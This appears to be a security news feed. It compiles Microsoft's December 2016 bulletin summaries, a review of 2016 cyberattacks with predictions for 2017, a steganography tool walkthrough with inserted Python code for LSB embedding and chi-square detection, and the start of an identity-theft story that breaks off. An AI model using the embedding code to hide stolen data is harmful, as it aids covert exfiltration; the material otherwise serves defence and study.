Severity Rating: Important
Revision Note: V1.0 (December 13, 2016): Bulletin published.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow elevation of privilege if a locally-authenticated attacker runs a specially crafted application on a targeted system. An attacker who successfully exploited the vulnerability could violate virtual trust levels (VTL).

MS16-144 – Critical: Cumulative Security Update for Internet Explorer (3204059) – Version: 1.0

Severity Rating: Critical
Revision Note: V1.0 (December 13, 2016): Bulletin published.
Summary: This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

MS16-146 – Critical: Security Update for Microsoft Graphics Component (3204066) – Version: 1.0

Severity Rating: Critical
Revision Note: V1.0 (December 13, 2016): Bulletin published.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if a user either visits a specially crafted website or opens a specially crafted document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

MS16-147 – Critical: Security Update for Microsoft Uniscribe (3204063) – Version: 1.0

Severity Rating: Critical
Revision Note: V1.0 (December 13, 2016): Bulletin published.
Summary: This security update resolves a vulnerability in Windows Uniscribe. The vulnerability could allow remote code execution if a user visits a specially crafted website or opens a specially crafted document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. This security update addresses the vulnerability by correcting how Windows Uniscribe handles objects in memory.

MS16-145 – Critical: Cumulative Security Update for Microsoft Edge (3204062) – Version: 1.0

Severity Rating: Critical
Revision Note: V1.0 (December 13, 2016): Bulletin published.
Summary: This security update resolves vulnerabilities in Microsoft Edge. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Microsoft Edge. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than users with administrative user rights.

MS16-138 – Important: Security Update for Microsoft Virtual Hard Disk Driver (3199647) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates. - Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867. - Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868. - Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876. - Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. - Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873. - Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874. These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: The Windows Virtual Hard Disk Driver improperly handles user access to certain files. An attacker can manipulate files in locations not intended to be available to the user by exploiting this vulnerability.

MS16-152 – Important: Security Update for Windows Kernel (3199709) – Version: 1.0

Severity Rating: Important
Revision Note: V1.0 (December 13, 2016): Bulletin published.
Summary: This security update resolves a vulnerability in Microsoft Windows. An information disclosure vulnerability exists when the Windows Kernel improperly handles objects in memory. The security update addresses the vulnerability by helping to ensure the kernel API correctly enforces access controls applied to this information.

MS16-134 – Important: Security Update for Common Log File System Driver (3193706) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates. - Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867. - Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868. - Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876. - Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. - Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873. - Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874. These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The vulnerabilities could allow elevation of privilege when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. In a local attack scenario, an attacker could exploit these vulnerabilities by running a specially crafted application to take complete control over the affected system. An attacker who successfully exploits these vulnerabilities could run processes in an elevated context.

MS16-153 – Important: Security Update for Common Log File System Driver (3207328) – Version: 1.0

Severity Rating: Important
Revision Note: V1.0 (December 13, 2016): Bulletin published.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow Information Disclosure when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. In a local attack scenario, an attacker could exploit this vulnerability by running a specially crafted application to bypass security measures on the affected system allowing further exploitation.

MS16-131 – Critical: Security Update for Microsoft Video Control (3199151) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates. - Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867. - Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868. - Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876. - Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. - Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873. - Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874. These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow remote code execution when Microsoft Video Control fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. However, an attacker must first convince a user to open either a specially crafted file or a program from either a webpage or an email message.

MS16-132 – Critical: Security Update for Microsoft Graphics Component (3199120) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates. - Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867. - Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868. - Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876. - Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. - Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873. - Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874. These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution when the Windows Animation Manager improperly handles objects in memory if a user visits a malicious webpage. An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. This security update is rated Critical for all supported releases of Microsoft Windows. For more information, see the Affected Software and Vulnerability Severity Ratings section.

MS16-118 – Critical: Cumulative Security Update for Internet Explorer (3192887) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the October Security Only updates. - Security Only update 3192391 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3192391. - Security Only update 3192393 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3192393. - Security Only update 3192392 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3192392. These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves vulnerabilities in Internet Explorer. The most severe of the vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited the vulnerabilities could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

MS16-130 – Critical: Security Update for Microsoft Windows (3199172) – Version: 2.0

Severity Rating: Critical
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates. - Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867. - Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868. - Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876. - Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. - Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873. - Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874. These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow elevation of privilege if a locally authenticated attacker runs a specially crafted application.

MS16-139 – Important: Security Update for Windows Kernel (3199720) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates. - Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867. - Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868. - Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876. - Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. - Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873. - Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874. These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves a vulnerability in Microsoft Windows. The vulnerability could allow elevation of privilege if an attacker runs a specially crafted application to access sensitive information. A locally authenticated attacker could attempt to exploit this vulnerability by running a specially crafted application. An attacker can gain access to information not intended to be available to the user by using this method.

MS16-135 – Important: Security Update for Windows Kernel-Mode Drivers (3199135) – Version: 2.0

Severity Rating: Important
Revision Note: V2.0 (December 13, 2016): Revised bulletin to announce the following updates have been rereleased with a detection change that addresses a supersedence issue that certain customers experienced when attempting to install the November Security Only updates. - Security Only update 3197867 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197867. - Monthly Rollup 3197868 for all supported releases of Windows 7 and Windows Server 2008 R2. For more information, see Microsoft Knowledge Base Article 3197868. - Security Only update 3197876 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197876. - Monthly Rollup 3197877 for Windows Server 2012. For more information, see Microsoft Knowledge Base Article 3197877. - Security Only update 3197873 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197873. - Monthly Rollup 3197874 for Windows 8.1 and Windows Server 2012 R2. For more information, see Microsoft Knowledge Base Article 3197874. These are detection changes only. There were no changes to the update files. Customers who have already successfully installed any of these updates do not need to take any action. For more information, see the Microsoft Knowledge Base article for the respective update.
Summary: This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that could exploit the vulnerabilities and take control of an affected system.

Cyber Security Predictions for 2017


Analysis

2016 kicked off with more than 20 million new samples of malware detected and neutralised by PandaLabs – an average of 227,000 per day. This figure is slightly higher than that of 2015, which saw around 225,000 per day.

Throughout 2016, we’ve seen how the number of new malware samples has been slightly lower than in 2015 — about 200,000 new samples of malware per day on average — however, attacks have become more effective.

Cybercriminals are becoming more confident in their abilities, and, although figures have been lower than expected, there is still cause for concern. Hackers appear to be concentrating their efforts into the most profitable attacks, utilising sophisticated techniques that allow them to make quick and easy money in an efficient manner.

Black Hats have turned their focus essentially to productivity, proliferating attacks on businesses that handle massive quantities of data and sensitive information. Once they’ve gained access to these businesses, they are able to infect as many computers as possible with ransomware, putting themselves in a position to demand millions in ransom or put the data up for sale on the black market.

If there is one thing that hasn’t changed over the course of this year, it’s the popularity of trojans, with ransomware at the forefront, continuing to top the statistical charts as they have for years.


Ranking the top attacks of 2016



Ransomware

We know that ransomware is a substantial business for cybercriminals, but it is incredibly tricky to measure the number of attacks reliably. What can be noted is the evolution of Ransomware attacks, in some cases having become particularly aggressive, as is the case of Petya. Instead of encrypting documents, Petya goes straight for the computer’s Master Boot Record (MBR) and makes it unserviceable until a ransom is paid.

Abuse of the system tool PowerShell, installed by default in Windows 10, has risen this year; it is frequently used in attacks to avoid detection by security solutions installed on victims’ computers.

In Q2 of 2016, one of the strangest cases of Ransomware involved a company in Slovenia. The company’s head of security received an email out of Russia informing him that their network had been compromised and that they were poised to launch ransomware on all of their computers if the company didn’t pay around €9000 in Bitcoins within 3 days. To prove that they did in fact have access to the organisation’s network, the hackers sent a file with a list of every device connected to the company’s internal network.

Ransomware as a Service (RaaS) emerged as the latest development in the Ransomware industry. In Q3 we witnessed a higher level of specialisation in the ransomware trade. The best example of this featured the creators of the ransomware Petya and Mischa, who specialised in the development of the malware and its corresponding payment platforms, leaving distribution in the hands of third parties. Once the creators have done their part, they leave it up to the distributors to infect the victims. Much like in the legal world, the distributors’ profit is derived from a percentage of the money acquired: the higher the sales, the higher the percentage that they receive.


Malicious email

Attacks don’t only come in the form of malvertising or compromised websites. A large number of them still arrive through email in the form of false invoices or other notifications. An attack of this sort was carried out in at least two European countries, in which cybercriminals posed as their respective local electricity supply companies. The message contained no attachment, showing only the billing information in text and including a link that when clicked would take you to the invoice details. The hook was an exorbitantly high payment that would entice an emotional response so that the recipient would click through to consult the supposed bill without thinking. Upon clicking the link, the user was directed to a website that resembled the company’s real website, where a bill could be downloaded. If the client downloaded and opened the file, they became infected with ransomware.


Business Email Compromise Phishing

Hackers will investigate how the company operates from the inside and gather information about their victims from social networks to give credibility to their con. The attackers then pose as the CEO or financial director of a company and request a transfer from an employee. This kind of attack is rapidly gaining in popularity.

A notable case this year affected Mattel, the well-known toy manufacturer of Barbies and Hot Wheels. A high ranking executive received a message from the recently appointed CEO soliciting a transfer of $3 million to a bank account in China. After making the transfer, he then confirmed with the CEO that it was done, who in turn was baffled, having not given such an order. They got in touch with the American authorities and with the bank, but it was too late and the money had already been transferred.

In this case they were fortunate. It was a bank holiday in China and there was enough time to alert the Chinese authorities. The account was frozen, and Mattel was able to recover their money.



Mobile Devices

SNAP is one of the most popular vulnerabilities that we’ve seen this year, affecting LG G3 mobile phones. The problem stemmed from an error in LG’s notifications app, called Smart Notice, which allowed any JavaScript to run. The researchers at BugSec discovered the vulnerability and notified LG, which rapidly published an update that resolved the problem.

Gugi, an Android trojan, managed to break through Android 6’s security barriers to steal bank credentials from apps installed on the phone. To accomplish this, Gugi superimposed a screen on top of the screen of the legitimate app asking for information that would then be sent directly to the criminals without their victims’ knowledge.

In August, Apple published an urgent update, version 9.3.5 of iOS. This version resolves three zero-day vulnerabilities employed by spyware known as Pegasus, developed by the NSO Group, an Israeli organization with products similar to those offered by Hacking Team.


Internet of Things

Connected cars are at risk from cyber-attack – investigators at the University of Birmingham showed how they had succeeded in compromising the power door lock system of every vehicle sold by the Volkswagen Group in the last twenty years. Researchers Charlie Miller and Chris Valasek, who last year demonstrated how to hack a Jeep Cherokee, took it one step further this year to show how they could manipulate at will the throttle, the brake, and even the steering wheel while the car was in gear.

Smart homes are just as vulnerable to attack – researchers Andrew Tierney and Ken Munro showed a proof of concept that they built to hijack a thermostat. After taking control of the thermostat (by inserting an SD card in it), they raised the temperature to 99 degrees Fahrenheit and required a PIN to deactivate it. The thermostat connected to an IRC channel, using the MAC address as an identifier for every compromised device. It demanded a bitcoin in exchange for the PIN, which changed every 30 seconds.



Cyberwarfare

2016 saw the United States go on the offensive and concede that it is launching cyber-attacks against Daesh targets. Robert Work, United States Deputy Secretary of Defense, made this clear in statements to CNN.

In February, South Korean officials discovered an attack originating from North Korea. The attack allegedly began over a year earlier, its primary target being 140,000 computers belonging to organisations and government agencies, as well as defense contractors. According to police statements, more than 42,000 documents were stolen, of which 95% were related to defense, such as, for example, documents containing plans and specs for the F-15 fighter jet.

At the height of the United States presidential election, one of the most significant incidents that took place was the discovery of an attack on the DNC (Democratic National Committee) in which a stockpile of data was plundered, and was then leaked to the public.

On the subject of the elections, the FBI issued an alert after detecting two attacks on electoral websites; in at least one of them the attackers, identified as foreign, were able to make off with voter registration data.

In August, a group calling itself “The Shadow Brokers” announced that it had hacked the NSA and published some of the “cyber weapons” that it had stolen, promising to sell the rest to the highest bidder.


Cybercrime

In June, a criminal dubbed “The Dark Overlord” put patient information from three US institutions up for sale on the black market. He had stolen information from over 650,000 patients and asked for around $700,000 for its return. Shortly thereafter, he put the personal information of 9.3 million clients of a medical insurance agency up for sale for 750 bitcoins.

In the last few months, Dropbox became another victim of cybercrime. It was recently revealed that the well-known file sharing service suffered an attack in 2012. The outcome: the theft of data from 68 million users.

One of the biggest attacks to date affected Yahoo – despite having taken place in 2014, the attack only became known recently. A total of 500 million accounts were compromised, making it the greatest theft in history.

In August 2016 we saw one of the greatest bitcoin thefts in history. Bitfinex, a company that deals in the commerce and exchange of cryptocurrency, was compromised and had an equivalent of 60 million dollars in bitcoins stolen from it, money which belonged to clients that had deposited their bitcoins in this “bank”. There is still no evidence pointing to the culprits, and the company has offered no information as to how it happened, as law enforcement agencies are still investigating the case.


DDoS Attacks

In September, Brian Krebs, the famed journalist specialising in security, blew the cover off of vDOS, a “business” that offered DDoS attack services. Shortly thereafter, the people responsible, who in two years had led 150,000 attacks and made a profit of $618,000, were arrested.

In retaliation hackers took down Krebs’s website through a crippling DDoS attack. In the end, Google, through its Project Shield, was able to protect it and the page came back online.

In the last quarter of the year, a wave of large-scale cyberattacks against the American DNS provider Dyn (DynDNS) disrupted the websites of some major global corporations. The brutal attack affected major organisations and international communications tools, such as Netflix, Twitter, Amazon, and The New York Times. Service was interrupted for almost 11 hours, affecting more than a billion clients worldwide.



POS’s and Credit Cards

The popular American fast food chain Wendy’s saw the point-of-sale (POS) terminals at more than 1,000 of its establishments infected with malware that stole credit card information from its clients. PandaLabs discovered an attack carried out with malware known as PunkeyPOS, which was used to infect more than 200 US restaurants.

Another such attack was discovered in 2016 by PandaLabs. Once again, the victims were US restaurants, a total of 300 establishments whose POS terminals had been infected with the malware PosCardStealer.


Financial Institutions

This year, the Central Bank of Bangladesh suffered an attack in which bank transfers totalling 1 billion US dollars were initiated. Fortunately, a large portion of those transfers were blocked, although the thieves had already succeeded in making off with 81 million dollars.

Shortly after that we witnessed two similar cases: one against a bank in Vietnam, another against a bank in Ecuador.



Social Networks

The security of 117 million LinkedIn users was at risk after a list of email addresses and their respective passwords was published.

On Twitter, 32 million usernames and passwords were put up for sale for around $6000. The social network denied that the account information had been acquired from its servers. In fact, the passwords were in plain text and the majority of them belonged to Russian users, hinting at the possibility that they were obtained by means of phishing or Trojans.

This year it came to light that MySpace was attacked. The intrusion happened in 2013, although up until May of this year it remained unknown. Usernames, passwords, and email addresses were taken, affecting up to 360 million accounts. A user may not have used MySpace in years, but if they are in the habit of reusing passwords and aren’t using two-factor authentication, they could be at risk.

Activating two-factor authentication, creating complex passwords and not reusing them across different websites are recommended to avoid these risks.

What cyber nightmares does 2017 have in store for us?


Ransomware

Having taken center stage in 2016, Ransomware will most likely do so again in 2017. In some ways, this kind of attack is cannibalising other more traditional ones that are based on information theft. Ransomware is a simpler and more direct way to make a profit, eliminating intermediaries and unnecessary risks.



Companies

Attacks on companies will be more numerous and sophisticated. Companies are already the prime target of cybercriminals. Their information is more valuable than that of private users.

Cybercriminals are always on the lookout for weaknesses in corporate networks through which they can gain access. Once inside, they use lateral movement to reach the resources that contain the information they are looking for. They can also launch large-scale ransomware attacks (infecting every available device with ransomware) in order to demand astronomical sums of money for the recovery of the affected companies' data.


Internet of Things

The Internet of Things (IoT) is fast becoming the next cybersecurity nightmare. Any kind of device connected to a network can be used as an entryway into corporate and home networks. The majority of these devices have not been designed with security in mind. Typically they do not receive automatic security updates, use weak passwords, and reuse the same credentials across thousands of devices, among other security flaws – all of this together makes them extremely vulnerable to outside attacks.


DDoS

The final months of 2016 witnessed the most powerful DDoS attacks in history. It began in September with an attack on Brian Krebs after he reported on the activities of an Israeli company that offered this kind of service. On the heels of that attack came another on the French company OVH (reaching 1Tbps of traffic) and another on the American company Dyn that left several major tech giants without Internet service.

These attacks were carried out by botnets made up of thousands of compromised IoT devices (IP cameras, routers). We can be certain that 2017 will see an increase in this kind of attack, which is typically used to blackmail companies or to harm their business.


Mobile Phones

The target is clear here as well — Android devices got the worst of it, which makes sense given that Android has the greatest market share. Focusing on one single OS makes it easier for cybercriminals to pick a target with maximal reach and profitability.

To complicate matters, updates do not depend only on what Android itself rolls out, but also on each hardware manufacturer’s decision of when and how to incorporate them – if at all. Given the number of security issues that crop up every month, this situation only puts users at greater risk.


Cyberwarfare

We are living in uncertain times with regard to international relations – threats of trade warfare, espionage, and tariffs with the potential to polarise the positions of the great powers. This can no doubt have vast and serious consequences in the field of cyber-security.

Governments will want access to more information, at a time when encryption is becoming more popular, and intelligence agencies will become more interested in obtaining information that could benefit industry in their countries.

A global situation of this kind could hamper data sharing initiatives — data that large companies are already sharing in order to better protect themselves against cyber-crime, setting standards and international engagement protocols.

The post Cyber Security Predictions for 2017 appeared first on CyberSafety.co.za.

Toolsmith – GSE Edition: Image Steganography & StegExpose

Cross-posted on the Internet Storm Center Diary.

Updated with contest winners 14 DEC. Congrats to:
Chrissy @SecAssistance
Owen Yang @HomingFromWork
Paul Craddy @pcraddy
Mason Pokladnik - Fellow STI grad
Elliot Harbin @klax0ff

In the last of a three part (Part 1-GCIH, Part 2-GCIA) series focused on tools I revisited during my GSE re-certification process, I thought it'd be timely and relevant to give you a bit of a walkthrough re: steganography tools. Steganography "represents the art and science of hiding information by embedding messages within other, seemingly harmless messages."
Stego has garnered quite a bit of attention again lately as party to both exploitation and exfiltration tactics. On 6 DEC 2016, ESET described millions of victims among readers of popular websites who had been targeted by the Stegano exploit kit hiding in pixels of malicious ads.
The Sucuri blog described credit card swipers in Magento sites on 17 OCT 2016, where attackers used image files as an obfuscation technique to hide stolen details from website owners, in images related to products sold on the victim website.

The GSE certification includes SANS 401 GSEC content, and Day 4 of the GSEC class content includes some time on steganography with the Image Steganography tool. Tools for steganographic creation are readily available, but a bit dated, including Image Steganography, last updated in 2011, and OpenStego, last updated in 2015. There are other older, command-line tools, but these two are really straightforward GUI-based options. Open source or free stego detection tools are unfortunately really dated and harder to find as a whole, unless you're a commercial tool user. StegExpose is one of a few open options that's fairly current (2015) and allows you to conduct steganalysis to detect LSB steganography in images. The LSB is the least significant bit in the byte value of an image pixel, and LSB-based image steganography embeds the hidden payload in the least significant bits of the pixel values of an image.
Image Steganography uses LSB steganography, making this a perfect opportunity to pit one against the other.
Download Image Steganography from Codeplex, then run Image Steganography Setup.exe. Run Image Steganography after installation and select a PNG for your image. You can then type text you'd like to embed, or input data from a file. I chose wtf.png for my image, and rr.ps1 as my input file. I chose to write out the resulting stego sample to wtf2.png, as seen in Figure 1.

Figure 1: Image Steganography
This process in reverse to decode a message is just as easy. Select the decode radio button, and the UI will switch to decode mode. I dragged in the wtf2.png file I'd just created, and opted to write the output to the same directory, as seen in Figure 2.
Figure 2: wtf.png decoded

Pretty simple, and the extracted rr.ps1 file was unchanged from the original embedded file.
Now, will StegExpose detect this file as steganographic? Download StegExpose from Github, unpack master.zip, and navigate to the resulting directory from a command prompt. Run StegExpose.jar against the directory with your steganographic image as follows: java -jar StegExpose.jar c:\tmp\output. Sure enough, steganography confirmed as seen in Figure 3.
Figure 3: StegExpose
Not bad, right? Easy operations on both sides of the equation.
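To make the two sides of that equation concrete, here is an added example (not code from the Toolsmith post, nor from the Image Steganography or StegExpose projects) that embeds and extracts an LSB payload and then runs the classic chi-square pairs-of-values test, one of the detectors StegExpose-style tools build on. The cover is a constructed 8-bit grayscale image held as a flat list of pixel values, and the 32-bit length header followed by one payload bit per pixel is an assumed layout chosen for the example, not Image Steganography's format.

```python
"""LSB embedding, extraction and a chi-square steganalysis check.

Added example; not code from the Toolsmith article or from the Image
Steganography / StegExpose projects. The cover image and payload are
constructed here so the script runs offline without an imaging library.
"""
import random

HEADER_BITS = 32  # assumed layout: 32-bit big-endian payload length, then payload bits


def make_cover(n_pixels, seed=1):
    """Constructed stand-in for a natural image: values 80..201, with even
    values four times as common as odd ones. Natural images likewise have
    unequal counts within each (2k, 2k+1) pair, which the chi-square attack exploits."""
    rng = random.Random(seed)
    return [2 * rng.randint(40, 100) + (1 if rng.random() < 0.2 else 0)
            for _ in range(n_pixels)]


def make_payload(n_bytes, seed=2):
    """Constructed pseudo-random payload, e.g. an encrypted or compressed file."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n_bytes))


def lsb_capacity(pixels):
    """Whole payload bytes that fit after the header, one bit per pixel."""
    return (len(pixels) - HEADER_BITS) // 8


def _bits(data):
    for byte in data:
        for i in range(7, -1, -1):
            yield (byte >> i) & 1


def lsb_embed(pixels, payload):
    """Return a copy of pixels with the payload written into the LSBs."""
    if len(payload) > lsb_capacity(pixels):
        raise ValueError("payload does not fit in cover image")
    header = len(payload).to_bytes(4, "big")
    out = list(pixels)
    for idx, bit in enumerate(_bits(header + payload)):
        out[idx] = (out[idx] & 0xFE) | bit  # clear the LSB, then set the payload bit
    return out


def _to_int(bits):
    value = 0
    for b in bits:
        value = (value << 1) | b
    return value


def lsb_extract(pixels):
    """Recover a payload written by lsb_embed (raises if the image is truncated)."""
    lsbs = [p & 1 for p in pixels]
    length = _to_int(lsbs[:HEADER_BITS])
    body = lsbs[HEADER_BITS:HEADER_BITS + 8 * length]
    if len(body) < 8 * length:
        raise ValueError("image does not contain a complete payload")
    return bytes(_to_int(body[i:i + 8]) for i in range(0, len(body), 8))


def chi_square_ratio(pixels):
    """Chi-square pairs-of-values statistic divided by its degrees of freedom.

    Embedding overwrites LSBs with payload bits, so the counts of 2k and 2k+1
    drift toward equality: the statistic drops to roughly 1 per degree of
    freedom, while an untouched image stays far above that."""
    hist = [0] * 256
    for p in pixels:
        hist[p] += 1
    chi2, df = 0.0, -1
    for k in range(128):
        even, odd = hist[2 * k], hist[2 * k + 1]
        if even + odd == 0:
            continue
        expected = (even + odd) / 2
        chi2 += (even - expected) ** 2 / expected + (odd - expected) ** 2 / expected
        df += 1
    return chi2 / df if df > 0 else float("inf")


def is_lsb_suspicious(pixels, threshold=3.0):
    """Flag equalised pair counts; the threshold is an example value, real
    tools combine several detectors and report a probability instead."""
    return chi_square_ratio(pixels) < threshold


if __name__ == "__main__":
    cover = make_cover(64 * 64)
    stego = lsb_embed(cover, make_payload(lsb_capacity(cover)))
    for name, img in (("cover", cover), ("stego", stego)):
        print("%s chi2/df=%.2f suspicious=%s" % (name, chi_square_ratio(img), is_lsb_suspicious(img)))
```

The detector only sees the equalisation in the region that was actually overwritten, so a small payload in a large image can slip under a whole-image test; this is why tools such as StegExpose also scan in blocks and combine several statistics.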

And now for a little contest. Five readers who email me via russ at holisticinfosec dot org and give me the most precise details regarding what I specifically hid in wtf2.png get a shout out here and $5 Starbucks gift cards for a little Christmastime caffeine.  

Contest: wtf2.png
Note: do not run the actual payload, it will annoy you to no end. If you must run it to decipher it, please do so in a VM. It's not malware, but again, it is annoying.

Cheers...until next time.

He Never Thought His Identity Would be Stolen

It was supposed to be a dream vacation. And it really was, until he came back home. When Adam left Poland and returned to New York, his life had become a nightmare.

While exploring the streets of Warsaw, he wasn’t only focused on the sights. His eyes were open and his senses sharp. Having grown up in Brooklyn, he was street smart and knew to watch out for pickpockets. But there was one threat he didn’t see coming.

Adam knew something was wrong as soon as he saw the credit card bills. After all, he’d been traveling, so he knew that the charges made while he was away couldn’t be his. He picked up the phone and called the credit card company. They confirmed what he now already feared – Adam’s identity had been stolen.

As the reality set in that both of his credit cards had been maxed out, Adam was hit with another bombshell: someone had also opened another card in his name. And that meant whoever was behind this crime also had access to his social security number and probably other personal information.

